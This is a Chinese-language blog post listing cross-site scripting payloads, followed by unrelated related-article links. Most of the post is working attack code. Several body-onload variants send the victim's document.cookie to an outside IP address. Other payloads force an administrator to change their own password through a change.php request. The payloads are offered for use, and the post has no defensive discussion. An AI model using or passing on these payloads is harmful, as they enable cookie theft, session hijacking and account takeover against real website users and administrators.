2. 程式人生 > 其它 >XSS之常用姿勢

XSS之常用姿勢

阿新 發佈:2022-04-18

body標籤

<body onload='load();'>
</body>

JS語句內呼叫

<script>
    window.onload = ...;
</script>

常用方式

# 當前頁面開啟新頁面
<body onload="window.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>

# 當前頁面開啟新頁面
<body onload="document.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>

# 父頁面開啟新頁面
<body onload="parent.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>

# 頂層頁面開啟新頁面
<body onload="top.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>

# 當前頁面開啟新頁面
<body onload="this.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>

# 當前頁面開啟新頁面
<body onload="self.location.href='http://101.35.221.145/?cookie=' + document.cookie"></body>


<script>window.location.href='xxx' + document.cookie</script>

利用方法

拿cookie登入

令管理員自己修改密碼

<script>window.location.href='http://127.0.0.1/api/change.php?p=dddddd';</script>

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

相關推薦

XSS常用姿勢

body標籤 <body onload=\'load();\'> </body> JS語句內呼叫 <script> window.onload = ...;

Mysql資料庫常用sql語句進階與總結

本文例項講述了Mysql資料庫常用sql語句。分享給大家供大家參考,具體如下:

Vue學習常用指令例項詳解

本文例項講述了Vue常用指令。分享給大家供大家參考,具體如下: 1、建立一個vue例項

Java併發程式設計常用的多執行緒實現方式分析

本文例項講述了Java併發程式設計常用的多執行緒實現方式。分享給大家供大家參考,具體如下:

MySQL資料庫基礎入門常用命令小結

本文例項講述了MySQL資料庫基礎入門常用命令。分享給大家供大家參考,具體如下:

Spring 應用上下文獲取 Bean 的常用姿勢例項總結

本文例項講述了Spring 應用上下文獲取 Bean 的常用姿勢。分享給大家供大家參考,具體如下:

第006講:Python常用操作符

一 python的常用操作符 1 算術操作符:加+ 減 - 乘* 除 / 取餘% 冪運算** (floor 除法,被小甲魚稱為地板除)//

Java基礎常用API

API scanner類 功能:可以實現鍵盤輸入資料,到程式當中 引用型別的一般使用步驟:

Python常用模組

Python之常用模組 模組,用一砣程式碼實現了某個功能的程式碼集合。 類似於函數語言程式設計和麵向過程程式設計,函數語言程式設計則完成一個功能,其他程式碼用來呼叫即可,提供了程式碼的重用性和程式碼間的耦合

5-Pandas常用的描述性統計函式、彙總函式

常用的描述性統計函式 函式 作用 函式 作用 count 非缺失樣本的數量 sum 求和 mean 均值

Redis服務常用配置(一)

  上一篇部落格聊了下redis的簡介以及redis的yum安裝和原始碼編譯安裝需要注意到問題,回顧請參考https://www.cnblogs.com/qiuhom-1874/p/13378138.html;今天我們來對redis的配置檔案相關資料和配置的使用和說明;

webpack常用plugin的配置和使用

概述 webpack中的外掛主要是用來完成loader和配置無法完成的事情 常見的幾種Plugins

Java學習常用類篇

Java學習常用類篇 0x00 前言 在開發中難免呼叫到各種api來開發程式,那就先來學習一下api的一些相關概念。

ES6常用開發知識點:入門(一)

ES6介紹 ES6, 全稱 ECMAScript 6.0 ,2015.06 發版。 let 和 const命令 let命令 let 命令,用來宣告變數。它的用法類似於var,區別在於var宣告的變數全域性有效,let 宣告的變數只在它所在的程式碼塊內有效。

17Python學習常用內建模組

常用內建模組 os 模組 os的檔案操作 remove() remove是刪除檔案的命令,需要一個引數,如果傳入的是一個路徑,報 IsADirectoryError 錯誤

Docker常用命令

1.通用命令 docker version:檢視版本等相關資訊 docker info:檢視容器映象等相關資訊

Appium常用API

Appium常用API解析 1、current_activity:獲取當前頁面的activity名,比如com.taobao.tao.TBMainActivity 或 com.taobao.browser.BrowserActivity

odoo12 修行提升篇 常用的高階函式 (二)

odoo中有很多封裝好的方法,非常實用,開發中用的比較多的當屬高階函數了。

java8常用新特性

java8中新特性有很多哦,今天研究一番,把常用的幾個新特性列舉出來,有一篇寫的特別好的部落格,連結如下:https://blog.csdn.net/yczz/article/details/50896975

【轉載】【Codec系列】常用位元速率控制演算法分析

來源:部落格園, 作者:SoaringLee_fighting 連結:https://www.cnblogs.com/SoaringLee/p/10532170.html